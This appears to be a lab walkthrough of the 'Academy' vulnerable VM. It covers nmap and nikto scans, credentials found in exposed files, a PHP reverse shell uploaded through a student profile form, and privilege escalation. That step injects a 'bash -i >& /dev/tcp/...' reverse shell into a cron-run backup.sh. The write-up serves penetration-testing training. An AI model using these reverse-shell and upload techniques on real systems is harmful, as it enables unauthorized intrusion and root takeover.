Walkthrough
Gaining a Foothold
Nmap
192.168.88.133
┌──(root㉿kali)-[~]
└─# nmap -p- -A -T4 192.168.88.133
Starting Nmap 7.94 ( [https://nmap.org](https://nmap.org/) ) at 2023-11-02 02:31 EDT
Nmap scan report for 192.168.88.133
Host is up (0.00087s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.88.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|*End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)
| 256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)
|* 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:12:8A:DE (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.87 ms 192.168.88.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.52 seconds
Port 22
Interesting items:
SSH
OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Port 21
Interesting items:
FTP vsftpd 3.0.3 ftp-anon: Anonymous FTP login allowed (FTP code 230) _-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
FTP server status: Connected to ::ffff:192.168.88.129 Logged in as ftp TYPE: ASCII No session bandwidth limit Session timeout in seconds is 300 Control connection is plain text Data connections will be plain text At session startup, client count was 3 vsFTPd 3.0.3 - secure, fast, stable
Port 80
Interesting items:
HTTP
80/tcp open http Apache httpd 2.4.38 ((Debian)) http-server-header: Apache/2.4.38 (Debian) http-title: Apache2 Debian Default Page: It works
Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation
https://www.exploit-db.com/exploits/46676
HTTP Request Smuggling attack
Apache HTTP Server privilege escalation from modules' scripts (CVE-2019-0211)
mod_ssl access control bypass (CVE-2019-0215)
https://httpd.apache.org/security/vulnerabilities_24.html
Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)
https://httpd.apache.org/security/vulnerabilities_24.html
/icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
/phpmyadmin/: phpMyAdmin directory found.
/phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
Nikto
┌──(root㉿kali)-[~] └─# nikto -h http://192.168.88.133
- Nikto v2.5.0
- Target IP: 192.168.88.133
- Target Hostname: 192.168.88.133
- Target Port: 80
- Start Time: 2023-11-02 02:37:37 (GMT-4)
- Server: Apache/2.4.38 (Debian)
- /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
- /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
- No CGI Directories found (use '-C all' to force check all possible dirs)
- /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c37b0dee585e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
- Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
- OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
- /phpmyadmin/changelog.php: Cookie goto created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
- /phpmyadmin/changelog.php: Cookie back created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
- /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
- /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
- /phpmyadmin/: phpMyAdmin directory found.
- /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
- 8254 requests: 0 error(s) and 12 item(s) reported on remote host
- End Time: 2023-11-02 02:37:50 (GMT-4) (13 seconds)
- 1 host(s) tested
Default Web Page
Readme files exposed
Information Disclosure
404 - Information Disclosure
Server Header - Information Disclosure
/phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
version 4.9.7
MySQL
Login credentials exposed in plaintext in note.txt
login: 10201321
password: cd73502828457d15655bbd7a63fb0bc8
Password: student
Exposed admin credentials in config.php
Logged in as 10201321:student
Student login page on 192.168.88.133/academy
Any image or file can be uploaded in the Student Registration under my profile
Exploitation
PHP reverse shell uploaded instead of a photo in student registration
Edited PHP reverse shell to point to the attacker machine and listened on the attacker machine
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
reverse shell saved and edited
Listener set up in the attacker machine and reverse shell uploaded in student registration.
Privilege escalation
Linpeas
Download linpeas.sh on attack machine and transfer it across to the target machine using web server and get command
Myphpadmin and other credentials exposed
ssh grimmie@192.168.137.129
My_V3ryS3cur3_P4ss
Pspy
Ran pspy64 on grimmie@academy to confirm that backup.sh runs every minute
Bash Reverse Shell
Edit the content of backup.sh to contain “bash -i >& /dev/tcp/192.168.137.128/8081 0>&1”
Gained root access after listening on port 8081
Video
When you click the link below, it will start from the Academy Walkthrough.